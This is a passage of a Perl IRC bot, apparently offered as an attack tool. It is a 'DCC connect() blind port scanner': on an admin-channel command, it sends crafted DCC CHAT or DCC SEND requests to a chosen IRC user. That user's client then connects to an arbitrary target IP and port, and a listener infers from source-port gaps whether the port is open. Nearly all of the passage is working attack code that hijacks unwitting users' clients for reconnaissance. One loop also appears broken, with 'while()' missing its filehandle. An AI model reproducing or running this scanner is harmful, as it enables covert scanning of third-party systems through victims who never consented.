115 | while($line = <$sock>){ 116 | if($line =~ /^PING/){ 117 | print $sock "PONG :" . (split(/ :/, $line))[1]; 118 | } 119 | if($line =~ /(376|422)/i){ 120 | #print $sock "NICKSERV :identify nick_password\n"; 121 | last; 122 | } 123 | } 124 | sleep 3; 125 | print $sock "JOIN $admin_channel nopnop\n"; 126 | 127 | ################### 128 | # START main loop # 129 | ################### 130 | 131 | while ($line = <$sock>) { 132 | #$text is the stuff from the ping or the text from the server 133 | ($command, $text) = split(/ :/, $line); 134 | 135 | ################ 136 | # PING handler # 137 | ################ 138 | 139 | if ($command eq 'PING'){ 140 | while ( (index($text,"\r") >= 0) || (index($text,"\n") >= 0) ){ chop($text); } 141 | print $sock "PONG $text\n"; 142 | next; 143 | } 144 | 145 | ################# 146 | # Main BOT code # 147 | ################# 148 | 149 | 150 | ($nick,$type,$channel) = split(/ /, $line); #split by spaces 151 | 152 | ($nick,$hostname) = split(/!/, $nick); #split by ! to get nick and hostname seperate 153 | 154 | $nick =~ s/://; #remove :'s 155 | #$text =~ s/://; 156 | 157 | #get rid of all line breaks. Again, many different way of doing this. 158 | $/ = "\r\n"; 159 | while($text =~ m#$/$#){ chomp($text); } 160 | 161 | 162 | ############### 163 | # CHANNEL CMD # 164 | ############### 165 | 166 | if($channel eq $admin_channel){ 167 | 168 | if($text =~ /!scan/){ 169 | ($trigger,$destination,$port,$nickname,$type) = split / /,$text; 170 | ($da,$db,$dc,$dd) = split /\./,$listener_ip; 171 | $decdest = sprintf("%2.2x%2.2x%2.2x%2.2x",$da,$db,$dc,$dd); 172 | $decdest = hex($decdest); 173 | ($scana,$scanb,$scanc,$scand) = split /\./,$destination; 174 | $scandest = sprintf("%2.2x%2.2x%2.2x%2.2x",$scana,$scanb,$scanc,$scand); 175 | $scandest = hex($scandest); 176 | sleep 2; 177 | print $sock "PRIVMSG $admin_channel :[ (IRC)DCC connect() blind port scanner\n"; 178 | if($type==1) 179 | { 180 | print $sock "PRIVMSG $admin_channel :[ checking $destination ($port/TCP) from $nickname using CHAT\n"; 181 | print $sock "PRIVMSG $nickname :\x01DCC CHAT CHAT $decdest $listner_port\x01\n"; 182 | sleep 5; 183 | print $sock "PRIVMSG $nickname :\x01DCC CHAT CHAT $scandest $port\x01\n"; 184 | sleep $dcc_timeout; # timeout ^ check 1 port 185 | print $sock "PRIVMSG $nickname :\x01DCC CHAT CHAT $decdest $listner_port\x01\n"; 186 | } 187 | if($type==2) 188 | { 189 | $file = rand(time()); 190 | print $sock "PRIVMSG $admin_channel :[ checking $destination ($port/TCP) from $nickname using SEND\n"; 191 | print $sock "PRIVMSG $nickname :\x01DCC SEND $file $decdest $listner_port 1864\x01\n"; 192 | sleep 5; 193 | $file = rand(time()); 194 | print $sock "PRIVMSG $nickname :\x01DCC SEND $file $scandest $port 1864\x01\n"; 195 | sleep $dcc_timeout; # timeout ^ check 1 port 196 | $file = rand(time()); 197 | print $sock "PRIVMSG $nickname :\x01DCC SEND $file $decdest $listner_port 1876\x01\n"; 198 | } 199 | sleep 3; 200 | open(OUT, "< tmp.txt"); 201 | while() 202 | { 203 | print $sock "PRIVMSG $admin_channel :$_"; 204 | sleep 1; 205 | } 206 | close(OUT); 207 | print $sock "PRIVMSG $admin_channel :[ done.\n"; 208 | open(OUT, "> tmp.txt"); 209 | print OUT ""; 210 | close(OUT); 211 | } 212 | 213 | } 214 | 215 | } 216 | } 217 | 218 | ################## 219 | # CHILD LISTENER # 220 | ################## 221 | if($pid==0)#The child listner loop, setting port number connects. 222 | { 223 | $serv = new IO::Socket::INET (LocalAddr => $listner_ip, 224 | LocalPort => $listner_port, 225 | Proto => 'tcp', 226 | Listen => 5); 227 | while(1){ 228 | $new_sock = $serv->accept(); 229 | $peerport = $new_sock->peerport(); 230 | close($new_sock); 231 | $baseport = $peerport; 232 | $new_sock = $serv->accept(); 233 | $peerport = $new_sock->peerport(); 234 | $result = $peerport - $baseport; 235 | open(OUT, "> tmp.txt"); 236 | if($baseport == 1024) ## WinXP(SP2)en. cavaet(src port 1025 unused!) 237 | { 238 | if($result == 2) 239 | { 240 | print OUT "[ port is closed (LST:$baseport SRC:$peerport RST:$result)\n"; 241 | } 242 | if($result == 3) 243 | { 244 | print OUT "[ port is open (LST:$baseport SRC:$peerport RST:$result)\n"; 245 | } 246 | } 247 | if($baseport != 1024) 248 | { 249 | if($result == 1) 250 | { 251 | print OUT "[ port is closed (LST:$baseport SRC:$peerport RST:$result)\n"; 252 | } 253 | if($result == 2) 254 | { 255 | print OUT "[ port is open (LST:$baseport SRC:$peerport RST:$result)\n"; 256 | } 257 | } 258 | close(OUT); 259 | close($new_sock); 260 | } 261 | } 262 | --------------------------------------------------------------------------------